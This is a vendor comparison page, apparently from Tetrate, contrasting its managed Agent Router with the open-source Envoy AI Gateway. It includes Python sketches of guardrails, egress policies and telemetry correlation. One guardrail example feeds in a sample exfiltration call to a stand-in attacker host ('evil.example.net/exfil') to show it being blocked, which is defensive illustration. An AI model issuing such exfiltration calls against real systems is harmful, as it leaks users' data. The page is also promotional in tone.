Tetrate Agent Router vs. Envoy AI Gateway: Build vs. Buy — From the Creators
Last updated: June 2026
TL;DR
Envoy AI Gateway is a fast-maturing open-source project — v0.6.0 (May 2026) reached its first production-stable API surface (v1beta1), with fine-grained MCP authorization, CEL-based auth, multi-provider support, and body redaction. It is the right foundation if your team has Kubernetes depth and the bandwidth to operate it. Tetrate Agent Router is that same data plane productized: managed operations, admin UX, authenticated identity, per-team attribution, guardrails, SSO, and audit — built and run by the people who co-created the project.
Note: the guardrails subsystem — PII/PHI redaction, regex and SLM-powered content enforcement, third-party integrations (AWS Bedrock Guardrails, Azure Content Safety, NVIDIA NeMo), and custom webhook guardrails — is not included in the open-source project. It is an enterprise-only capability.
Why this comparison is unique
Tetrate doesn’t just integrate with Envoy AI Gateway — Tetrate co-created it, with Bloomberg, and maintains it as part of the Envoy ecosystem. That means this page isn’t a vendor comparing against a third-party project; it is the team behind the project explaining when the OSS version is the right choice vs. when you should use the operated product built on top of it.
We will give you the honest answer.
What each option is
Envoy AI Gateway (OSS) is a Cloud Native Computing Foundation project that extends Envoy Gateway for AI/LLM use cases. As of v0.6.0 (May 2026) it includes: multi-provider routing (OpenAI, Anthropic, AWS Bedrock, Gemini, Vertex AI), OpenAI-compatible API translation, token-based rate limiting, fine-grained MCP authorization with CEL policies, OAuth authentication for MCP, prompt caching, body redaction, intelligent inference routing (InferencePool), and native OpenTelemetry observability. The v1beta1 API graduation means core CRDs are now stable. It runs on Kubernetes. You operate it.
Tetrate Agent Router is that same data plane, delivered as a product: managed operations, an admin UX, authenticated identity on every request, per-team cost attribution with showback/chargeback, MCP tool governance, runtime guardrails, SSO, immutable audit logs, enterprise SLA, and forward-deployed Tetrate engineers. Enterprise tier adds data-plane placement options (VPC, on-premises, edge, per-region) under a Tetrate-managed control plane.
Same foundation. Rapidly maturing OSS on one side. Fully operated, governed product on the other.
Head-to-head comparison
| | Envoy AI Gateway (OSS) | Tetrate Agent Router |
|---|---|---|
| API stability | v1beta1 as of v0.6.0 (May 2026) — production-ready core CRDs | GA product |
| Who operates it | Your team — K8s, upgrades, CVE patches, observability | Tetrate (managed) or jointly supported (Enterprise) |
| Distributed deployment | Single K8s cluster you deploy and operate; multi-cluster requires your own automation | Tetrate-managed control plane + data planes in VPC/on-prem/per-region/edge |
| Admin UX | Build your own or use raw K8s tooling | Included |
| MCP support | Yes — fine-grained CEL authorization, OAuth, MCP Stdio servers, per-backend header forwarding | Native: curated catalog, MCP profiles, OAuth + API-key auth |
| MCP Profiles / least-privilege | Not included; build access scoping yourself | Per-agent MCP Profiles: restrict to specific tool subsets, reduce context window usage, prevent automatic exposure of new upstream tools |
| Identity / auth | CEL-based auth policies; integrate SSO yourself | Authenticated identity bound to every request; SSO included |
| Cost attribution | Token rate limiting; build attribution yourself | Per-person / team / agent / project; showback + chargeback |
| Runtime guardrails | Body redaction (v0.6.0); build other integrations yourself | Regex guardrails, SLM-powered PII/PHI redaction (with ~100ms latency trade-off), third-party integrations (AWS Bedrock Guardrails, Azure Content Safety, NVIDIA NeMo), custom webhook/DLP integration; monitor / block / redact actions; full OTEL trace correlation across guardrail events |
| Audit / compliance | Build your own | Immutable audit logs; EU AI Act-grade |
| SLA / support | Community (GitHub, Slack, Monday community meetings) | Enterprise SLA; forward-deployed Tetrate engineers |
| CVE remediation | Your team tracks and patches | Tetrate-managed |
| Project maintained by | Envoy community, incl. Tetrate | The co-creators of the project |
One control plane, distributed data planes
This is where the build-vs-buy gap widens most. Self-hosting Envoy AI Gateway gives you one Kubernetes cluster you operate. Scaling to multi-region or multi-cloud means running and coordinating multiple clusters yourself — your team’s responsibility to automate, synchronize, and govern.
Tetrate Agent Router Enterprise runs a fundamentally different topology: one Tetrate-managed control plane governing distributed data planes deployed wherever your agents run — across multiple cloud VPCs (AWS, Azure, GCP), on-premises, at the edge, or per-region with localized model catalogs, region-specific guardrails, and data controls. Each data plane enforces the right policy for its environment; the control plane ensures consistency across all of them without duplicating logic in each application.
This matters most when your platform team is small relative to the number of teams or agents it serves. Self-managing a fleet of Envoy AI Gateway instances means replicating policy configuration, guardrail rules, and catalog updates across each one, using automation your team must build and maintain. The Tetrate control plane centralizes that: one place to set which models are approved, which MCP servers are reachable, and which guardrail rules apply, with those policies automatically distributed to every data plane in the fleet. A small IAM or platform team can govern a large population of developers and agents without manually tracking each gateway instance.
A concrete example: if your agents run across both Azure and AWS, you may want to apply Azure Content Safety at your Azure data planes and AWS Bedrock Guardrails at your AWS data planes, or you may want Azure Content Safety applied uniformly everywhere regardless of cloud. That orchestration is managed from one control plane rather than configured redundantly per cluster.
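To make the Azure/AWS example concrete, here is a minimal Python sketch of how a central policy might resolve to a per-data-plane guardrail list. It is an illustration only, not Tetrate's implementation: the `DataPlane` and `FleetPolicy` types, the guardrail identifiers, and the data-plane names are all hypothetical.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class DataPlane:
    name: str
    cloud: str  # hypothetical label, e.g. "azure" or "aws"


@dataclass
class FleetPolicy:
    # Guardrails applied on every data plane, regardless of cloud.
    global_guardrails: list[str] = field(default_factory=list)
    # Extra guardrails keyed by cloud provider.
    per_cloud_guardrails: dict[str, list[str]] = field(default_factory=dict)

    def resolve(self, plane: DataPlane) -> list[str]:
        """Return the guardrails one data plane should enforce, without duplicates."""
        combined = self.global_guardrails + self.per_cloud_guardrails.get(plane.cloud, [])
        return list(dict.fromkeys(combined))  # de-duplicate while keeping order


fleet = [DataPlane("eu-west", "azure"), DataPlane("us-east", "aws")]

# Option 1: each cloud uses its native guardrail service.
per_cloud = FleetPolicy(per_cloud_guardrails={
    "azure": ["azure-content-safety"],
    "aws": ["bedrock-guardrails"],
})
# Option 2: one guardrail service applied uniformly everywhere.
uniform = FleetPolicy(global_guardrails=["azure-content-safety"])

per_cloud_result = {p.name: per_cloud.resolve(p) for p in fleet}
uniform_result = {p.name: uniform.resolve(p) for p in fleet}
```

Either option is a single policy object evaluated once per data plane, which is the property the control-plane model relies on: the rule is written in one place and the per-environment result is derived from it.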
For enterprises running agents across multiple teams, geographies, or regulatory jurisdictions — a financial services firm with EU and US data planes, a retailer deploying edge inference per service area — this is the architectural capability that a self-hosted single-cluster model does not provide without significant build work. It is also the capability most grounded in Tetrate’s core lineage: the same distributed systems architecture Tetrate builds and runs for Envoy at enterprise scale.
Agent isolation in Kubernetes
A common enterprise requirement — especially for platform teams operationalizing agents — is not just routing agent traffic but constraining what agents can reach. The pattern: deploy agents into a dedicated Kubernetes namespace or cluster, enforce a network policy that allows only egress through the Agent Router data plane, and configure the catalog to expose only approved LLM endpoints and MCP servers. Agents cannot reach arbitrary external URLs directly.
This gives you a hard enforcement boundary: an agent that attempts to call an unapproved endpoint — whether by design, by prompt injection, or by an LLM-generated tool call — is blocked at the network layer before the request leaves the cluster.
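As a rough sketch of the isolation pattern, the Python below builds a standard Kubernetes `NetworkPolicy` manifest that limits egress from an agent namespace to the namespace hosting the gateway data plane, plus DNS. The namespace names (`agents`, `agent-router`), the policy name, and the assumption that cluster DNS runs in `kube-system` are illustrative, not taken from the product. Enforcement also depends on a CNI plugin that implements NetworkPolicy.

```python
import json


def egress_only_via_gateway(agent_namespace: str, gateway_namespace: str) -> dict:
    """Build a NetworkPolicy manifest that restricts egress for all agent pods."""

    def namespace_peer(name: str) -> dict:
        # kubernetes.io/metadata.name is set automatically on every namespace.
        return {"namespaceSelector": {"matchLabels": {"kubernetes.io/metadata.name": name}}}

    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": "agents-egress-via-gateway", "namespace": agent_namespace},
        "spec": {
            "podSelector": {},  # empty selector: every pod in the agent namespace
            "policyTypes": ["Egress"],
            "egress": [
                # Allow traffic to the namespace that hosts the gateway data plane.
                {"to": [namespace_peer(gateway_namespace)]},
                # Allow DNS so agents can resolve the gateway's service name
                # (assumes cluster DNS runs in kube-system).
                {
                    "to": [namespace_peer("kube-system")],
                    "ports": [
                        {"protocol": "UDP", "port": 53},
                        {"protocol": "TCP", "port": 53},
                    ],
                },
            ],
        },
    }


policy = egress_only_via_gateway("agents", "agent-router")
manifest = json.dumps(policy, indent=2)  # kubectl accepts JSON manifests as well as YAML
```

Because the policy lists only two egress rules, any destination outside the gateway namespace and DNS is denied by default once the policy selects the pod.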
The trickier case is brownfield: existing applications that are becoming agentic. If a legacy service depends on third-party APIs that you cannot immediately block, a transition approach is to run the Agent Router as a transparent proxy first — collecting telemetry on which routes are actually called — and then build the allow list incrementally, tightening the policy over time rather than blocking everything on day one.
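The incremental approach can be sketched as a small aggregation over observed traffic. The following Python is a hypothetical illustration: it assumes the telemetry can be exported as a list of request URLs, and the `min_calls` threshold and sample hosts are invented for the example.

```python
from collections import Counter
from urllib.parse import urlsplit


def propose_allow_list(observed_urls: list[str], min_calls: int = 2) -> list[str]:
    """Return hosts seen at least min_calls times, sorted by name."""
    hosts = Counter()
    for url in observed_urls:
        host = urlsplit(url).hostname
        if host:
            hosts[host] += 1
    return sorted(h for h, n in hosts.items() if n >= min_calls)


# Hypothetical URLs collected while the gateway ran as a transparent proxy.
observed = [
    "https://api.openai.com/v1/chat/completions",
    "https://api.openai.com/v1/embeddings",
    "https://payments.example.com/charge",
    "https://payments.example.com/refund",
    "https://unknown.example.net/ping",
]
allow_list = propose_allow_list(observed)
```

Hosts below the threshold, such as the single call to `unknown.example.net` here, are left off the proposed list so a person can review them before the policy is tightened.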
Guardrails add a second enforcement layer on top of network policy: because Agent Router sits inline on both LLM requests and MCP calls, it can inspect the LLM’s output for patterns — a URL appearing in a tool-call instruction, a domain name in a response — and block or flag before the downstream call is made. Network policy enforces where traffic can go; guardrails enforce what the LLM is being instructed to do.
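A regex-style check of this kind might look like the sketch below. It is a simplified illustration rather than the product's guardrail engine: the `check_output` function, the URL pattern, and the host names are assumptions, and it only catches URLs with an explicit `http` or `https` scheme, not bare domain names.

```python
import re
from urllib.parse import urlsplit

# Matches http(s) URLs up to whitespace, a quote, or a closing parenthesis.
URL_PATTERN = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)


def check_output(text: str, approved_hosts: set[str]) -> tuple[str, list[str]]:
    """Return ("block" or "allow", unapproved hosts found in the LLM output)."""
    violations = []
    for url in URL_PATTERN.findall(text):
        try:
            host = urlsplit(url).hostname
        except ValueError:
            host = None
        # URLs that cannot be parsed are reported as-is and treated as violations.
        label = host or url
        if label not in approved_hosts and label not in violations:
            violations.append(label)
    return ("block" if violations else "allow", violations)


approved = {"api.openai.com", "mcp.internal.example.com"}
ok = check_output("Call https://mcp.internal.example.com/tools/search next.", approved)
bad = check_output('fetch("https://evil.example.net/exfil?d=1")', approved)
```

A production guardrail would typically also support the monitor and redact actions rather than only block, but the inspection step has the same shape.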
The integration problem: why unified telemetry matters
Many organizations approach AI infrastructure the same way they approached microservices a decade ago: different teams build an LLM gateway, an MCP gateway, and a developer portal independently — loosely integrated or not integrated at all. The result is three systems that each have partial visibility.
When Agent Router sits inline on both LLM traffic and MCP/tool-call traffic, it becomes possible to correlate across them. A concrete example: if the LLM’s output contains a URL, and within milliseconds that same URL appears as an outbound network call through the gateway, you can infer that the call was most likely an LLM-generated instruction rather than one initiated by normal application code. That distinction between a code-path call and an LLM-instructed call is not detectable if your inference gateway and your egress gateway are separate systems with separate logs.
This is where audit logs, OTEL trace correlation IDs, and guardrails all connect: a guardrail event, a routing decision, and an MCP tool call can be traced back to the same originating LLM request. A decoupled stack cannot provide this view without building a custom data pipeline to join the logs.
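The URL correlation example above can be sketched as a time-window join between LLM responses and outbound calls. This Python is a heuristic illustration only: the record types, the 500 ms window, and the trace IDs are hypothetical, and a match in time is evidence rather than proof that the LLM initiated the call.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class LlmResponse:
    trace_id: str
    timestamp_ms: int
    urls: frozenset[str]  # URLs that appeared in the model's output


@dataclass(frozen=True)
class EgressCall:
    timestamp_ms: int
    url: str


def classify(call: EgressCall, responses: list[LlmResponse],
             window_ms: int = 500) -> tuple[str, Optional[str]]:
    """Label an outbound call and return the trace ID of the matching LLM response, if any."""
    for resp in responses:
        delay = call.timestamp_ms - resp.timestamp_ms
        # The call must follow the response, within the window, and target a URL it contained.
        if call.url in resp.urls and 0 <= delay <= window_ms:
            return ("llm-instructed", resp.trace_id)
    return ("code-path", None)


responses = [LlmResponse("trace-1", 1000, frozenset({"https://files.example.net/upload"}))]

soon_after = classify(EgressCall(1040, "https://files.example.net/upload"), responses)
unrelated = classify(EgressCall(1040, "https://api.example.com/health"), responses)
much_later = classify(EgressCall(9000, "https://files.example.net/upload"), responses)
```

The join is only possible because both record streams pass through the same system and share a clock and a trace ID, which is the point of the unified-telemetry argument.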
The honest build vs. buy calculus
Envoy AI Gateway is maturing quickly — the v1beta1 graduation is a meaningful milestone. Self-hosting is increasingly viable for teams with the right skills. Here is an honest framework for deciding.
Self-hosting Envoy AI Gateway is the right choice when:
- You have strong Envoy and Kubernetes operational expertise on your platform team.
- You want full control, no licensing cost, and the flexibility to extend via the CNCF ecosystem.
- Your governance and attribution needs are modest, or you are prepared to build them on top of the OSS primitives (CEL auth, body redaction, token rate limiting).
- You want to contribute to and shape the open-source project directly.
- You are comfortable operating at v1beta1 stability and tracking the release cadence yourself.
Tetrate Agent Router is the right choice when:
- You want your engineers shipping agents, not operating gateway infrastructure.
- You need org-wide governance — per-team attribution, showback/chargeback, identity on every request — without building it yourself on top of OSS primitives.
- You need to enforce hard egress boundaries for agents running in Kubernetes — restricting reachable LLM endpoints and MCP servers at the network layer, not just at the application layer.
- You need to correlate LLM inference traffic with downstream MCP and tool-call traffic for security auditing — detecting LLM-generated instructions that attempt to reach unapproved endpoints.
- You need an enterprise SLA, compliance evidence, and data-residency control.
- You want the same team that maintains the open-source project to run your production gateway.
Choose self-hosted Envoy AI Gateway when:
- Your platform team has Envoy/K8s depth and wants full control over the data plane.
- You have operational capacity for upgrades, CVE tracking, and observability build-out.
- OSS community support (GitHub, Slack, Monday community meetings) is sufficient.
- You intend to contribute to or deeply customize the project.
Choose Tetrate Agent Router when:
- You want the Envoy AI Gateway foundation without the operational burden.
- You need to run distributed data planes across multiple regions, VPCs, or on-prem environments — governed from one control plane, without building the multi-cluster automation yourself.
- Governance, attribution, identity, and audit are requirements today, not future roadmap items.
- You need an enterprise SLA, compliance evidence, and data-residency control.
- You want to accelerate: ship agents in weeks, not build platform infrastructure for months.
Frequently asked questions
Is Tetrate Agent Router just Envoy AI Gateway with a UI? No — the UI is one component. Tetrate Agent Router adds managed operations, authenticated identity on every request, per-team cost attribution with showback/chargeback, MCP tool governance, runtime guardrails, SSO, immutable audit logs, enterprise SLA, forward-deployed engineers, and CVE-managed builds. The OSS project (v0.6.0) has body redaction and CEL-based auth — Tetrate Agent Router packages and operates those capabilities and adds the full governance layer on top.
Can I start with OSS Envoy AI Gateway and migrate to Tetrate Agent Router later? Yes — the shared data-plane foundation makes this a natural path. Your routing config, provider integrations, and Envoy expertise all carry over. Reach out to Tetrate’s forward-deployed engineers to plan a migration.
Does Tetrate Agent Router support self-service access for individual developers and application teams? Yes. There are two tiers of access. Administrators configure the top-level policy: which LLM models are in the approved catalog, which MCP servers are reachable, which guardrail rules apply globally. Within those bounds, individual developers and application teams can self-service: provision their own API keys, create MCP Profiles that restrict their agents to a specific subset of the allowed tools, set per-agent rate limits, and configure fallback policies. Platform teams can serve a large population of developers without manually reviewing each agent’s tool access.
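One way to picture the two tiers is as a set intersection: an agent sees only the tools that its profile requests, that administrators have approved, and that the upstream server actually offers. The sketch below is a conceptual model with hypothetical tool names, not the product's API.

```python
def effective_tools(admin_allowed: set[str], profile_tools: set[str],
                    upstream_tools: set[str]) -> set[str]:
    """Tools visible to an agent: requested by its profile, approved by admins, offered upstream."""
    return profile_tools & admin_allowed & upstream_tools


# Hypothetical tool names for an upstream MCP server.
upstream = {"search_issues", "create_issue", "delete_repo"}
admin_allowed = {"search_issues", "create_issue"}  # set by administrators
profile = {"search_issues"}                        # set by the application team

visible = effective_tools(admin_allowed, profile, upstream)

# A tool added upstream later is not exposed unless a profile and the admins opt in.
upstream_after_update = upstream | {"transfer_repo"}
visible_after_update = effective_tools(admin_allowed, profile, upstream_after_update)

# A profile cannot widen access beyond what administrators approved.
overreaching = effective_tools(admin_allowed, {"search_issues", "delete_repo"}, upstream)
```

Modeling access as an intersection is what keeps self-service safe: a developer's choices can only narrow the administrator's policy, never expand it.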
Does the guardrails system require sending data to an external API? It depends on which guardrail type you use. Regex-based guardrails and SLM-powered guardrails (PII/PHI redaction) run inline at the data plane — in your network, with no external API call. Third-party guardrail integrations (AWS Bedrock Guardrails, Azure Content Safety, NVIDIA NeMo) make an API call to the respective external service before the routing decision. Custom webhook guardrails call your own endpoint. You can mix: run SLM-based guardrails everywhere with low latency overhead (~100ms), and reserve third-party integrations for specific high-sensitivity gateways.
We already have a homegrown LLM gateway. Do we have to rip and replace to adopt Tetrate Agent Router? No. A layering approach works well: deploy Tetrate Agent Router behind your existing gateway to add controls, observability, and guardrails, then retire the homegrown components incrementally as you build confidence. Your existing gateway also serves as an inventory of what needs to transition, which typically makes the migration easier than starting from scratch. Bloomberg used a similar pattern when they outgrew their internal LLM proxy and adopted Envoy AI Gateway.
Does Tetrate contribute back to the Envoy AI Gateway project? Yes. Tetrate is a primary maintainer. Using Tetrate Agent Router supports ongoing development of the OSS project.
What if I need FIPS-compliant builds? Tetrate Enterprise Gateway for Envoy (TEG) provides FIPS-verified, CVE-protected builds. Ask about the full Tetrate product line for compliance-sensitive environments.
Compare other gateways: vs. Portkey · vs. Kong AI Gateway · vs. Bifrost · vs. Cloudflare AI Gateway · vs. LiteLLM
See the full 2026 enterprise AI gateway comparison.
MCP Catalog with verified first-party servers, profile-based configuration, and OpenInference observability are now generally available in Tetrate Agent Router Service. Start building production AI agents today.